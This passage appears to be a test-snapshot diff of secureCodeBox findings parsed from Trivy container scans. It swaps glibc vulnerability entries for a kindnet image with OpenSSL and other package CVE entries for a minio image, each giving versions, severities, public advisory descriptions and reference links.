"https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", + ], + }, + "category": "Vulnerability", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openssl: RSA authentication weakness", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - 